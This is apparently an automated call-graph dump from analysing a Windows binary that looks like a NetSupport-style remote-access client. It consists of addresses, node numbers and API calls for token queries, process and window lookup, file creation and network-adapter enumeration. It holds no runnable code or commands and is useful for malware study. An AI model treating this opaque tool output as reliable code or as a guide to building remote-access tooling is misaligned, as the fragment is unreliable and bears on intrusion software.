110cdf26 84530->84533 84532->84530 84557 110290f0 261 API calls 84532->84557 84536 110cedc0 84533->84536 84537 110cedce 84536->84537 84538 110cede9 84537->84538 84539 110cedd2 84537->84539 84541 110cee1c 84538->84541 84543 110cede6 84538->84543 84589 110290f0 261 API calls 84539->84589 84542 110cee90 84541->84542 84558 110ce710 84541->84558 84542->84518 84542->84519 84543->84538 84590 110290f0 261 API calls 84543->84590 84549 110cee4f 84549->84542 84550 110cee79 84549->84550 84591 110290f0 261 API calls 84550->84591 84559 110ce71d 84558->84559 84560 110ce738 84559->84560 84561 110ce721 84559->84561 84563 110ce735 84560->84563 84564 110ce756 84560->84564 84597 110290f0 261 API calls 84561->84597 84563->84560 84598 110290f0 261 API calls 84563->84598 84592 110ce180 84564->84592 84569 110ce650 84570 110ce65c 84569->84570 84571 110ce677 84570->84571 84572 110ce660 84570->84572 84574 110ce697 84571->84574 84575 110ce674 84571->84575 84619 110290f0 261 API calls 84572->84619 84575->84571 84593 110ce18b 84592->84593 84594 110ce1a2 84592->84594 84599 110290f0 261 API calls 84593->84599 84594->84549 84594->84569 84644->84479 84648 110ce31c 84647->84648 84649 110ce309 84647->84649 84649->84648 84653 1110c420 261 API calls 84652->84653 84654 110ffe0d 84653->84654 84655 110ffe40 84654->84655 84660 110ffcc0 84654->84660 84655->84366 84657 110ffe2d 84657->84366 84658->84370 84659->84372 84667 1115bd20 84660->84667 84663 110ffd27 84665 110ffd60 GetStockObject RegisterClassA 84663->84665 84664 110ffd91 CreateWindowExA 84664->84657 84665->84664 84666 110ffd8a 84665->84666 84666->84664 84670 1115ab80 GlobalAddAtomA 84667->84670 84671 1115abb5 GetLastError wsprintfA 84670->84671 84672 1115ac07 GlobalAddAtomA GlobalAddAtomA 84670->84672 84679 110290f0 261 API calls 84671->84679 84674 1115e4d1 5 API calls 84672->84674 84676 110ffcf1 GlobalAddAtomA 84674->84676 84676->84663 84676->84664 84681 1109dc40 GetTokenInformation 84680->84681 84686 1109dcd6 84680->84686 84683 1109dc62 84681->84683 84682 1115e4d1 5 API calls 84684 1109dce8 84682->84684 84685 1109dc68 GetTokenInformation 84683->84685 84683->84686 84684->84228 84685->84686 84687 1109dc7a 84685->84687 84686->84682 84688 1109dcaf EqualSid 84687->84688 84689 1109dc83 AllocateAndInitializeSid 84687->84689 84688->84686 84690 1109dcbd 84688->84690 84689->84686 84689->84688 84691 1115e4d1 5 API calls 84690->84691 84692 1109dcd2 84691->84692 84692->84228 84694 1116021d 84693->84694 84695 1116020b 84693->84695 84708 111601ac 75 API calls 84694->84708 84695->84253 84697 11160227 84697->84253 84699 11080d0d 84698->84699 84700 11080d12 84698->84700 84709 11080a30 IsDBCSLeadByte 84699->84709 84702 11080d1b 84700->84702 84703 11080d33 84700->84703 84710 1115ff54 81 API calls 84702->84710 84705 11080d39 84703->84705 84707 11161f66 81 API calls 84703->84707 84705->84245 84706 11080d2c 84706->84245 84707->84703 84708->84697 84709->84700 84710->84706 84711->84103 84712->84097 84713->84110 84714->84114 84715->84113 84716->84114 84718 111610dd 84717->84718 84719 111610f6 84717->84719 84718->84719 84750 1116c9b8 8 API calls 84718->84750 84721 11161d95 84719->84721 84751 1116fe36 LeaveCriticalSection 84721->84751 84723 11161ce2 84724 11161a47 84723->84724 84742->84123 84743->84128 84750->84719 84751->84723 84879 1113f146 84878->84879 84880 1113f203 84879->84880 84881 11080b10 IsDBCSLeadByte 84879->84881 84880->84150 84882 1113f16b 84881->84882 84883 11080b10 IsDBCSLeadByte 84882->84883 84884 1113f19b 84883->84884 84884->84150 84898 11112b00 84916 11141990 84898->84916 84901 11112b45 84902 11112b54 CoInitialize CoCreateInstance 84901->84902 84903 11112b28 84901->84903 84905 11112b84 LoadLibraryA 84902->84905 84915 11112b79 84902->84915 84906 1115e4d1 5 API calls 84903->84906 84904 11141710 86 API calls 84904->84901 84908 11112ba0 GetProcAddress 84905->84908 84905->84915 84907 11112b36 84906->84907 84911 11112bb0 SHGetSettings 84908->84911 84912 11112bc4 FreeLibrary 84908->84912 84909 11112c61 CoUninitialize 84910 11112c67 84909->84910 84913 1115e4d1 5 API calls 84910->84913 84911->84912 84912->84915 84914 11112c76 84913->84914 84915->84909 84915->84910 84917 11141710 86 API calls 84916->84917 84918 11112b1e 84917->84918 84918->84901 84918->84903 84918->84904 84919 11017610 GetTickCount 84926 11017520 84919->84926 84924 11142a60 21 API calls 84925 11017657 84924->84925 84927 11017540 84926->84927 84928 110175f6 84926->84928 84929 11017562 CoInitialize 84927->84929 84931 11017559 WaitForSingleObject 84927->84931 84930 1115e4d1 5 API calls 84928->84930 84954 111585e0 84929->84954 84933 11017605 84930->84933 84931->84929 84940 11017440 84933->84940 84934 110175f0 CoUninitialize 84934->84928 84935 11017591 84936 110175dc 84935->84936 84938 111601fd 75 API calls 84935->84938 84939 110175e2 84935->84939 84966 11160007 35 API calls 84936->84966 84938->84935 84939->84928 84939->84934 84941 11017460 84940->84941 84949 11017506 84940->84949 84943 11017478 CoInitialize 84941->84943 84945 1101746f WaitForSingleObject 84941->84945 84942 1115e4d1 5 API calls 84944 11017515 SetEvent GetTickCount 84942->84944 84946 111585e0 271 API calls 84943->84946 84944->84924 84945->84943 84951 110174a7 84946->84951 84947 110174f2 84948 11017500 CoUninitialize 84947->84948 84947->84949 84948->84949 84949->84942 84950 110174ec 85000 11160007 35 API calls 84950->85000 84951->84947 84951->84950 84953 111601fd 75 API calls 84951->84953 84953->84951 84955 111585f4 84954->84955 84956 111585ec 84954->84956 84967 1115f97b 84955->84967 84956->84935 84959 11158614 84959->84935 84960 11158740 84962 1115f3b5 23 API calls 84960->84962 84963 11158768 84962->84963 84963->84935 84964 11158631 84964->84960 84965 11158724 SetLastError 84964->84965 84965->84964 84966->84939 84968 1116c936 23 API calls 84967->84968 84969 1115f995 84968->84969 84973 11158608 84969->84973 84991 11165abf 23 API calls 84969->84991 84971 1115f9a8 84971->84973 84992 11165abf 23 API calls 84971->84992 84973->84959 84973->84960 84974 11158220 CoInitializeSecurity CoCreateInstance 84973->84974 84975 11158295 wsprintfW SysAllocString 84974->84975 84976 11158414 84974->84976 84981 111582db 84975->84981 84977 1115e4d1 5 API calls 84976->84977 84979 11158440 84977->84979 84978 11158401 SysFreeString 84978->84976 84979->84964 84980 111583e9 84980->84978 84981->84978 84981->84980 84981->84981 84982 1115836c 84981->84982 84983 1115835a wsprintfW 84981->84983 84993 110967f0 84982->84993 84983->84982 84985 1115837e 84986 110967f0 262 API calls 84985->84986 84987 11158393 84986->84987 84998 110968b0 InterlockedDecrement SysFreeString 84987->84998 84989 111583d7 84999 110968b0 InterlockedDecrement SysFreeString 84989->84999 84991->84971 84992->84973 84994 1110c420 261 API calls 84993->84994 84995 11096823 84994->84995 84996 11096836 SysAllocString 84995->84996 84997 11096854 84995->84997 84996->84997 84997->84985 84998->84989 84999->84980 85000->84947 85001 11025850 85002 11025860 85001->85002 85003 1102585a 85001->85003 85004 11160535 98 API calls 85003->85004 85004->85002 85005 11030b10 85006 11030b1e 85005->85006 85010 11142490 85006->85010 85009 11030b3f 85013 11141680 85010->85013 85014 11141690 85013->85014 85014->85014 85015 1110c4a0 261 API calls 85014->85015 85016 111416a2 85015->85016 85019 111415b0 85016->85019 85018 11030b2f SetUnhandledExceptionFilter 85018->85009 85020 11141602 85019->85020 85021 111415c7 85019->85021 85030 1113ed90 MultiByteToWideChar 85020->85030 85021->85021 85022 1115e4d1 5 API calls 85021->85022 85024 111415fe 85022->85024 85024->85018 85025 11141634 85031 1113edd0 WideCharToMultiByte GetLastError 85025->85031 85027 11141646 85028 1115e4d1 5 API calls 85027->85028 85029 11141659 85028->85029 85029->85018 85030->85025 85031->85027 85032 11137300 85033 1113730c 85032->85033 85034 111373da 85033->85034 85035 111373c8 85033->85035 85039 11137368 85033->85039 85035->85034 85036 11136060 374 API calls 85035->85036 85036->85034 85037 111373a0 85042 11136060 85037->85042 85039->85034 85039->85037 85041 1105d340 75 API calls 85039->85041 85040 111373b1 85041->85037 85043 1113649f 85042->85043 85046 1113607d 85042->85046 85044 1115e4d1 5 API calls 85043->85044 85045 111364ae 85044->85045 85045->85040 85046->85043 85047 11141710 86 API calls 85046->85047 85048 111360bc 85047->85048 85048->85043 85049 1105d340 75 API calls 85048->85049 85050 111360eb 85049->85050 85122 111299f0 85050->85122 85052 11136230 PostMessageA 85053 11136245 85052->85053 85055 11136255 85053->85055 85136 1110c270 InterlockedDecrement 85053->85136 85054 1105d340 75 API calls 85056 1113622c 85054->85056 85058 1113625b 85055->85058 85059 1113627d 85055->85059 85056->85052 85056->85053 85061 111362b3 85058->85061 85062 111362ce 85058->85062 85137 1112d530 297 API calls 85059->85137 85069 1115e4d1 5 API calls 85061->85069 85140 1113f4f0 85062->85140 85063 11136285 85138 111434d0 263 API calls 85063->85138 85067 111362d3 85145 111434f0 85067->85145 85068 1113628f 85139 11129bf0 SetDlgItemTextA 85068->85139 85072 111362ca 85069->85072 85072->85040 85074 111362a0 85074->85058 85077 111361db 85077->85052 85077->85054 85123 11129a0c 85122->85123 85124 11129a47 85123->85124 85125 11129a34 85123->85125 85159 1106ae60 294 API calls 85124->85159 85127 111434f0 265 API calls 85125->85127 85128 11129a3f 85127->85128 85129 1113e8f0 261 API calls 85128->85129 85130 11129a93 85128->85130 85129->85130 85130->85077 85131 11142150 85130->85131 85132 1110c650 4 API calls 85131->85132 85133 1114215f 85132->85133 85160 11141100 85133->85160 85136->85055 85137->85063 85138->85068 85139->85074 85141 1113f4f9 85140->85141 85142 1113f4ff 85140->85142 85141->85067 85143 1102a250 141 API calls 85142->85143 85144 1113f516 85143->85144 85144->85067 85178 111433b0 85145->85178 85159->85128 85171 110952d0 85160->85171 85163 11141124 wsprintfA 85164 11141137 85163->85164 85165 11141152 85164->85165 85166 1114113b 85164->85166 85168 11141163 85165->85168 85174 11140d70 85165->85174 85173 110290f0 261 API calls 85166->85173 85168->85077 85172 110952d9 LoadStringA 85171->85172 85172->85163 85172->85164 85177 11140d9a 85174->85177 85175 1115e4d1 5 API calls 85176 11140ea3 85175->85176 85176->85168 85177->85175 85177->85177 85179 110952d0 85178->85179 85180 111433de LoadStringA 85179->85180 85181 11143402 85180->85181 85182 111433f0 85180->85182 85184 1114341e 85181->85184 85185 11143409 wsprintfA 85181->85185 85183 11140d70 5 API calls 85182->85183 85183->85181 85186 1114343a 85184->85186 85187 11143426 85184->85187 85185->85186 85193 11143250 85186->85193 85207 110290f0 261 API calls 85187->85207 85191 1115e4d1 5 API calls 85192 111362da SetWindowTextA 85191->85192 85194 11080b10 IsDBCSLeadByte 85193->85194 85195 111432a0 85194->85195 85196 111432e3 wvsprintfA 85195->85196 85197 111601fd 75 API calls 85195->85197 85198 111432f8 85196->85198 85199 111432b3 85197->85199 85200 11143314 85198->85200 85201 11142a60 21 API calls 85198->85201 85199->85196 85204 111432c0 FormatMessageA 85199->85204 85202 1113e8f0 261 API calls 85200->85202 85201->85200 85203 11143324 85202->85203 85205 1115e4d1 5 API calls 85203->85205 85204->85198 85206 111433a6 85205->85206 85206->85191 85208 11132080 85209 11132089 85208->85209 85215 111320b8 85208->85215 85210 11141990 86 API calls 85209->85210 85211 1113208e 85210->85211 85211->85215 85216 1112fc80 85211->85216 85213 11132097 85214 1105d340 75 API calls 85213->85214 85213->85215 85214->85215 85219 1112fca1 85216->85219 85241 1112fdc1 85216->85241 85217 1115e4d1 5 API calls 85218 1112fdd5 85217->85218 85218->85213 85220 1112fcb6 85219->85220 85221 1112fccd 85219->85221 85222 1115e4d1 5 API calls 85220->85222 85223 11141240 261 API calls 85221->85223 85224 1112fcc9 85222->85224 85225 1112fcda wsprintfA 85223->85225 85224->85213 85244 1113f8a0 85225->85244 85227 1112fd00 85228 1112fd07 85227->85228 85229 1112fd78 85227->85229 85255 110b6bd0 85228->85255 85230 11141240 261 API calls 85229->85230 85232 1112fd84 wsprintfA 85230->85232 85234 1113f8a0 8 API calls 85232->85234 85233 1112fd12 85235 1112fda4 85233->85235 85236 1112fd1a GetTickCount SHGetFolderPathA GetTickCount 85233->85236 85234->85235 85239 11142a60 21 API calls 85235->85239 85237 1112fd50 85236->85237 85238 1112fd45 85236->85238 85237->85235 85270 110eb6b0 9 API calls 85237->85270 85240 11142a60 21 API calls 85238->85240 85239->85241 85240->85237 85241->85217 85243 1112fd73 85243->85235 85245 1113f8c1 CreateFileA 85244->85245 85247 1113f95e CloseHandle 85245->85247 85248 1113f93e 85245->85248 85251 1115e4d1 5 API calls 85247->85251 85249 1113f942 CreateFileA 85248->85249 85250 1113f97b 85248->85250 85249->85247 85249->85250 85253 1115e4d1 5 API calls 85250->85253 85252 1113f977 85251->85252 85252->85227 85254 1113f98a 85253->85254 85254->85227 85256 110b6be3 GetModuleHandleA GetProcAddress 85255->85256 85257 110b6ca4 85255->85257 85258 110b6c2a GetCurrentProcessId OpenProcess 85256->85258 85259 110b6c0f GetCurrentProcessId 85256->85259 85257->85233 85260 110b6c47 OpenProcessToken 85258->85260 85263 110b6c77 85258->85263 85261 110b6c18 85259->85261 85262 110b6c58 85260->85262 85260->85263 85261->85258 85264 110b6c1c 85261->85264 85262->85263 85265 110b6c5f GetTokenInformation 85262->85265 85266 110b6c93 CloseHandle 85263->85266 85267 110b6c96 85263->85267 85264->85233 85265->85263 85266->85267 85268 110b6c9a CloseHandle 85267->85268 85269 110b6c9d 85267->85269 85268->85269 85269->85257 85270->85243 85271 1102e15e 85272 11080c50 82 API calls 85271->85272 85273 1102e171 85272->85273 85274 1113f220 82 API calls 85273->85274 85275 1102e19a 85274->85275 85276 1115f5b7 75 API calls 85275->85276 85280 1102e1a7 85275->85280 85276->85280 85277 1102e1d6 85278 1102e248 85277->85278 85279 1102e22f GetSystemMetrics 85277->85279 85284 1102e262 CreateEventA 85278->85284 85279->85278 85281 1102e23e 85279->85281 85280->85277 85282 11141710 86 API calls 85280->85282 85283 11142a60 21 API calls 85281->85283 85282->85277 85283->85278 85285 1102e275 85284->85285 85286 1102e289 85284->85286 86187 110290f0 261 API calls 85285->86187 85288 1110c420 261 API calls 85286->85288 85289 1102e290 85288->85289 85290 1110d060 420 API calls 85289->85290 85291 1102e2b0 85290->85291 85292 1110c420 261 API calls 85291->85292 85293 1102e2c4 85292->85293 85294 1110d060 420 API calls 85293->85294 85295 1102e2e4 85294->85295 85296 1110c420 261 API calls 85295->85296 85297 1102e363 85296->85297 85298 11060520 261 API calls 85297->85298 85299 1102e393 85298->85299 85300 1110c420 261 API calls 85299->85300 85301 1102e3ad 85300->85301 85302 1102e3d6 FindWindowA 85301->85302 85303 1102e527 85302->85303 85304 1102e40b 85302->85304 85636 11060970 85303->85636 85304->85303 85307 1102e423 GetWindowThreadProcessId 85304->85307 85309 11142a60 21 API calls 85307->85309 85308 11060970 264 API calls 85310 1102e545 85308->85310 85311 1102e449 OpenProcess 85309->85311 85312 11060970 264 API calls 85310->85312 85311->85303 85313 1102e469 85311->85313 85314 1102e551 85312->85314 85320 11142a60 21 API calls 85313->85320 85315 1102e568 85314->85315 85316 1102e55f 85314->85316 85643 11141f80 85315->85643 86188 110279d0 115 API calls 85316->86188 85318 1102e564 85318->85315 85322 1102e49c 85320->85322 85323 1102e4db CloseHandle FindWindowA 85322->85323 85327 11142a60 21 API calls 85322->85327 85324 1102e503 GetWindowThreadProcessId 85323->85324 85325 1102e517 85323->85325 85324->85325 85328 11142a60 21 API calls 85325->85328 85330 1102e4ae SendMessageA WaitForSingleObject 85327->85330 85331 1102e524 85328->85331 85330->85323 85333 1102e4ce 85330->85333 85331->85303 85334 11142a60 21 API calls 85333->85334 85335 1102e4d8 85334->85335 85335->85323 85637 110609e6 85636->85637 85638 11060997 85636->85638 85639 1115e4d1 5 API calls 85637->85639 85638->85637 85642 11080c50 82 API calls 85638->85642 86210 11060890 264 API calls 85638->86210 85641 1102e539 85639->85641 85641->85308 85642->85638 85644 11141240 261 API calls 85643->85644 85645 11141f9b wsprintfA 85644->85645 85646 11141240 261 API calls 85645->85646 85647 11141fb7 wsprintfA 85646->85647 85648 1113f8a0 8 API calls 85647->85648 85649 11141fd4 85648->85649 85650 11142000 85649->85650 85652 1113f8a0 8 API calls 85649->85652 85651 1115e4d1 5 API calls 85650->85651 85654 11141fe9 85652->85654 85654->85650 86188->85318 86210->85638 87358 110400d8 87368 110f8740 GetTokenInformation 87358->87368 87360 110400ea CloseHandle 87361 11040101 87360->87361 87362 110f8740 15 API calls 87361->87362 87363 1104019a 87362->87363 87364 110401a2 CloseHandle 87363->87364 87365 110401a9 87363->87365 87364->87365 87366 1115e4d1 5 API calls 87365->87366 87367 110401e7 87366->87367 87369 110f8788 87368->87369 87370 110f8777 87368->87370 87378 110efc70 9 API calls 87369->87378 87371 1115e4d1 5 API calls 87370->87371 87373 110f8784 87371->87373 87373->87360 87374 110f87ac 87374->87370 87375 110f87b4 87374->87375 87376 1115e4d1 5 API calls 87375->87376 87377 110f87da 87376->87377 87377->87360 87378->87374 87379 689d0d40 LoadLibraryA 87380 689d0d54 GetProcAddress 87379->87380 87383 689d0da6 87379->87383 87381 689d0d67 GetAdaptersAddresses 87380->87381 87380->87383 87382 689d0d7d 87381->87382 87381->87383 87384 689d1b69 RtlAllocateHeap 87382->87384 87385 689d0d91 GetAdaptersAddresses 87384->87385 87385->87382 87385->87383 87386 11170208 87387 11167f85 62 API calls 87386->87387 87388 11170225 87387->87388 87389 11170232 GetLocaleInfoA 87388->87389 87390 11170265 87389->87390 87391 11170259 87389->87391 87409 11160e4e 81 API calls 87390->87409 87393 1115e4d1 5 API calls 87391->87393 87395 111703d5 87393->87395 87394 11170271 87396 1117027b GetLocaleInfoA 87394->87396 87407 111702ab 87394->87407 87396->87391 87397 1117029a 87396->87397 87410 11160e4e 81 API calls 87397->87410 87398 1117031e GetLocaleInfoA 87398->87391 87400 11170341 87398->87400 87412 11160e4e 81 API calls 87400->87412 87401 111702a5 87401->87407 87411 1115ff54 81 API calls 87401->87411 87403 1117034c 87403->87391 87406 11170354 87403->87406 87413 11160e4e 81 API calls 87403->87413 87406->87391 87414 111701ad GetLocaleInfoW 87406->87414 87407->87391 87407->87398 87409->87394 87410->87401 87411->87407 87412->87403 87413->87406 87414->87391 87415 110618d9 87416 110618e4 87415->87416 87417 11080c50 82 API calls 87416->87417 87418 11061901 87417->87418 87419 1106197a 87418->87419 87420 11061908 GetTickCount CheckLicenseString wsprintfA 87418->87420 87421 1105d430 269 API calls 87419->87421 87422 11061950 87420->87422 87425 110615b0 87421->87425 87422->87419 87423 11061b42 ExitProcess 87422->87423 87426 11160c1d 87425->87426 87427 11160c29 87426->87427 87428 11160c3c 87427->87428 87430 11160c6d 87427->87430 87463 11165abf 23 API calls 87428->87463 87433 11167769 EnterCriticalSection 87430->87433 87435 11160c4c 87430->87435 87431 11160c41 87464 1116a6d4 11 API calls 87431->87464 87434 11160c7b 87433->87434 87436 11165a57 34 API calls 87434->87436 87439 11160cf1 87434->87439 87435->87425 87441 11160c8c 87436->87441 87437 11160d1e 87467 11160d4d LeaveCriticalSection LeaveCriticalSection 87437->87467 87439->87437 87445 1116e1f5 87439->87445 87441->87439 87465 11165abf 23 API calls 87441->87465 87443 11160ce6 87466 1116a6d4 11 API calls 87443->87466 87446 1116e202 87445->87446 87450 1116e217 87445->87450 87498 11165abf 23 API calls 87446->87498 87448 1116e207 87499 1116a6d4 11 API calls 87448->87499 87451 11165a57 34 API calls 87450->87451 87455 1116e212 87450->87455 87452 1116e260 87451->87452 87468 11170fc0 87452->87468 87454 1116e267 87454->87455 87456 11165a57 34 API calls 87454->87456 87455->87439 87457 1116e28a 87456->87457 87457->87455 87458 11165a57 34 API calls 87457->87458 87459 1116e296 87458->87459 87459->87455 87460 11165a57 34 API calls 87459->87460 87461 1116e2a3 87460->87461 87462 11165a57 34 API calls 87461->87462 87462->87455 87463->87431 87464->87435 87465->87443 87466->87439 87467->87435 87469 11170fcc 87468->87469 87470 11170fd4 87469->87470 87471 11170fef 87469->87471 87500 11165ad2 23 API calls 87470->87500 87473 11170ffb 87471->87473 87477 11171035 87471->87477 87502 11165ad2 23 API calls 87473->87502 87474 11170fd9 87501 11165abf 23 API calls 87474->87501 87476 11171000 87503 11165abf 23 API calls 87476->87503 87480 11171057 87477->87480 87481 11171042 87477->87481 87483 111731d2 3 API calls 87480->87483 87505 11165ad2 23 API calls 87481->87505 87486 1117105d 87483->87486 87484 11171047 87506 11165abf 23 API calls 87484->87506 87485 11170fe1 87485->87454 87487 1117107f 87486->87487 87488 1117106b 87486->87488 87507 11165abf 23 API calls 87487->87507 87491 11170a09 44 API calls 87488->87491 87494 11171077 87491->87494 87493 11171008 87504 1116a6d4 11 API calls 87493->87504 87509 111710ae LeaveCriticalSection 87494->87509 87495 11171084 87508 11165ad2 23 API calls 87495->87508 87498->87448 87499->87455 87500->87474 87501->87485 87502->87476 87503->87493 87504->87485 87505->87484 87506->87493 87507->87495 87508->87494 87509->87485 87510 401020 GetCommandLineA 87511 401032 87510->87511 87511->87511 87512 40106c GetStartupInfoA 87511->87512 87513 401086 GetModuleHandleA 87512->87513 87517 401000 _NSMClient32 87513->87517 87516 4010a8 ExitProcess 87517->87516 87518 110259a0 LoadLibraryA 87519 110259e0 87520 110259ee GetProcAddress 87519->87520 87521 110259ff 87519->87521 87520->87521 87522 11025a18 87521->87522 87523 11025a0c K32GetProcessImageFileNameA 87521->87523 87525 11025a1e GetProcAddress 87522->87525 87526 11025a2f 87522->87526 87523->87522 87524 11025a51 87523->87524 87525->87526 87527 11025a36 87526->87527 87528 11025a47 SetLastError 87526->87528 87528->87524 87529 11140870 87530 11140881 87529->87530 87543 11140290 87530->87543 87534 11140905 87536 11140922 87534->87536 87538 11140904 87534->87538 87535 111408cb 87537 111408d2 ResetEvent 87535->87537 87551 11140450 261 API calls 87537->87551 87538->87534 87552 11140450 261 API calls 87538->87552 87540 111408e6 SetEvent WaitForMultipleObjects 87540->87537 87540->87538 87542 1114091f 87542->87536 87544 1114029c GetCurrentProcess 87543->87544 87545 111402bf 87543->87545 87544->87545 87546 111402ad GetModuleFileNameA 87544->87546 87547 1110c420 259 API calls 87545->87547 87550 111402e9 WaitForMultipleObjects 87545->87550 87546->87545 87548 111402db 87547->87548 87548->87550 87553 1113fbe0 GetModuleFileNameA 87548->87553 87550->87534 87550->87535 87551->87540 87552->87542 87554 1113fc63 87553->87554 87555 1113fc23 87553->87555 87557 1113fc89 GetModuleHandleA GetProcAddress 87554->87557 87558 1113fc6f LoadLibraryA 87554->87558 87556 11080be0 IsDBCSLeadByte 87555->87556 87559 1113fc31 87556->87559 87561 1113fcb7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87557->87561 87562 1113fca9 87557->87562 87558->87557 87560 1113fc7e LoadLibraryA 87558->87560 87559->87554 87563 1113fc38 LoadLibraryA 87559->87563 87560->87557 87564 1113fce3 10 API calls 87561->87564 87562->87564 87563->87554 87565 1115e4d1 5 API calls 87564->87565 87566 1113fd60 87565->87566 87566->87550 87567 11088b20 87570 110887b0 87567->87570 87611 11087ab0 6 API calls 87570->87611 87572 110887e9 GetParent 87573 110887fc 87572->87573 87574 1108880d 87572->87574 87575 11088800 GetParent 87573->87575 87576 11141430 263 API calls 87574->87576 87575->87574 87575->87575 87577 11088819 87576->87577 87578 1116076b 139 API calls 87577->87578 87579 11088826 87578->87579 87580 11141430 263 API calls 87579->87580 87581 1108883f 87580->87581 87612 110139e0 22 API calls 87581->87612 87583 1108885a 87583->87583 87584 1113f8a0 8 API calls 87583->87584 87586 1108889a 87584->87586 87585 110888b5 87587 11160535 98 API calls 87585->87587 87589 110888d3 87585->87589 87586->87585 87588 1113e8f0 261 API calls 87586->87588 87587->87589 87588->87585 87590 1102a250 141 API calls 87589->87590 87600 11088984 87589->87600 87592 11088923 87590->87592 87591 1115e4d1 5 API calls 87593 11088a72 87591->87593 87594 1113e8f0 261 API calls 87592->87594 87595 1108892b 87594->87595 87596 11080be0 IsDBCSLeadByte 87595->87596 87597 11088942 87596->87597 87598 11080c50 82 API calls 87597->87598 87597->87600 87599 1108895a 87598->87599 87601 1108899e 87599->87601 87602 11088961 87599->87602 87600->87591 87603 11080c50 82 API calls 87601->87603 87613 110b6880 87602->87613 87605 110889a9 87603->87605 87605->87600 87607 110b6880 36 API calls 87605->87607 87609 110889b6 87607->87609 87608 110b6880 36 API calls 87608->87600 87609->87600 87610 110b6880 36 API calls 87609->87610 87610->87600 87611->87572 87612->87583 87616 110b6860 87613->87616 87619 11163ab3 87616->87619 87622 11163a34 87619->87622 87623 11163a41 87622->87623 87624 11163a5b 87622->87624 87640 11165ad2 23 API calls 87623->87640 87624->87623 87625 11163a64 GetFileAttributesA 87624->87625 87627 11163a72 GetLastError 87625->87627 87632 11163a88 87625->87632 87643 11165ae5 23 API calls 87627->87643 87628 11163a46 87641 11165abf 23 API calls 87628->87641 87631 11163a4d 87642 1116a6d4 11 API calls 87631->87642 87636 11088967 87632->87636 87645 11165ad2 23 API calls 87632->87645 87636->87600 87636->87608 87637 11163a9b 87646 11165abf 23 API calls 87637->87646 87639 11163a7e 87644 11165abf 23 API calls 87639->87644 87640->87628 87641->87631 87642->87636 87643->87639 87644->87636 87645->87637 87646->87639 87647 110302a9 87648 1113f670 RegQueryValueExA 87647->87648 87649 110302d1 87648->87649 87650 110303bc RegCloseKey 87649->87650 87651 1115f5b7 75 API calls 87649->87651 87652 110303e6 87650->87652 87653 110302e5 87651->87653 87654 110303ed 87652->87654 87656 110304d1 87652->87656 87655 111601fd 75 API calls 87653->87655 87659 1110c420 261 API calls 87654->87659 87657 110302f4 87655->87657 87658 1110c420 261 API calls 87656->87658 87660 11030312 87657->87660 87663 111601fd 75 API calls 87657->87663 87661 110304d8 87658->87661 87662 11030414 87659->87662 87665 1115f5b7 75 API calls 87660->87665 87729 110f8130 268 API calls 87661->87729 87666 11105d40 443 API calls 87662->87666 87663->87657 87670 1103031e 87665->87670 87667 11030430 GetStockObject GetObjectA 87666->87667 87669 11030696 SetErrorMode SetErrorMode 87667->87669 87673 1110c420 261 API calls 87669->87673 87670->87650 87672 1113f670 RegQueryValueExA 87670->87672 87674 11030374 87672->87674 87675 110306d2 87673->87675 87676 1113f670 RegQueryValueExA 87674->87676 87678 11027fe0 264 API calls 87675->87678 87677 1103039d 87676->87677 87677->87650 87679 110306ec 87678->87679 87680 1110c420 261 API calls 87679->87680 87681 11030712 87680->87681 87682 11027fe0 264 API calls 87681->87682 87683 1103072b InterlockedExchange 87682->87683 87685 1110c420 261 API calls 87683->87685 87686 11030753 87685->87686 87687 11089840 263 API calls 87686->87687 87688 1103076b GetACP 87687->87688 87690 1115f8a3 96 API calls 87688->87690 87691 11030792 87690->87691 87692 11161c63 97 API calls 87691->87692 87693 1103079c 87692->87693 87694 1113f220 82 API calls 87693->87694 87695 110307c8 87694->87695 87696 1110c420 261 API calls 87695->87696 87697 110307e8 87696->87697 87698 11060520 261 API calls 87697->87698 87699 11030813 87698->87699 87700 1103083a 87699->87700 87702 1110c420 261 API calls 87699->87702 87701 110cb920 4 API calls 87700->87701 87703 11030886 87701->87703 87702->87700 87704 1110c420 261 API calls 87703->87704 87705 1103088d 87704->87705 87706 110308e0 87705->87706 87707 11030967 87705->87707 87708 1110c420 261 API calls 87706->87708 87716 11030965 87707->87716 87732 11121fc0 428 API calls 87707->87732 87711 110308e7 87708->87711 87710 1100d500 FreeLibrary 87713 11030980 87710->87713 87712 110879a0 264 API calls 87711->87712 87714 110308ff 87711->87714 87712->87714 87717 1100d220 wsprintfA 87713->87717 87720 11030999 87713->87720 87715 1110c420 261 API calls 87714->87715 87718 11030916 87715->87718 87716->87710 87719 1103098e 87717->87719 87725 1103093a 87718->87725 87730 1105b8c0 298 API calls 87718->87730 87721 11142a60 21 API calls 87719->87721 87723 1115e4d1 5 API calls 87720->87723 87721->87720 87724 11030aff 87723->87724 87729->87667 87730->87725 87732->87716 87733 1106132b 87734 11061333 87733->87734 87735 110614b7 87734->87735 87736 11160c1d 49 API calls 87734->87736 87737 11160c1d 49 API calls 87735->87737 87738 11061367 87736->87738 87740 110614d1 87737->87740 87739 1106136e 87738->87739 87748 110613bd 87738->87748 87741 110613a3 87739->87741 87743 11160535 98 API calls 87739->87743 87742 1106151d 87740->87742 87745 11160535 98 API calls 87740->87745 87744 110ce4f0 261 API calls 87741->87744 87746 110ce4f0 261 API calls 87742->87746 87743->87741 87747 110613b1 87744->87747 87745->87742 87746->87747 87749 1115e4d1 5 API calls 87747->87749 87751 1115f5b7 75 API calls 87748->87751 87750 1106225f 87749->87750 87752 1106142d 87751->87752 87753 111415b0 8 API calls 87752->87753 87754 11061449 87753->87754 87754->87735 87755 11061458 87754->87755 87756 1106149d 87755->87756 87757 11160535 98 API calls 87755->87757 87758 110ce4f0 261 API calls 87756->87758 87757->87756 87758->87747 87759 1102ce2d InterlockedIncrement 87760 1102ce59 GetCurrentProcess SetPriorityClass 87759->87760 87761 1102ce3c 87759->87761 87763 1102ce8d 87760->87763 87762 11142a60 21 API calls 87761->87762 87764 1102ce46 87762->87764 87766 1102ce96 SetEvent 87763->87766 87767 1102ce9d 87763->87767 87765 1102ce50 Sleep 87764->87765 87765->87765 87766->87767 87768 1102ced4 87767->87768 87854 11029010 275 API calls 87767->87854 87769 1102cf02 87768->87769 87856 1109e4e0 271 API calls 87768->87856 87857 11028b10 499 API calls 87769->87857 87773 1102cebd 87855 110fd040 274 API calls 87773->87855 87774 1102cf13 87837 11027d00 SetEvent 87774->87837 87777 1102cf18 87778 1102cf22 87777->87778 87779 1102cf4f 87777->87779 87778->87777 87858 11058ac0 SetEvent 87778->87858 87781 1102cf57 87779->87781 87782 1102cf8e 87779->87782 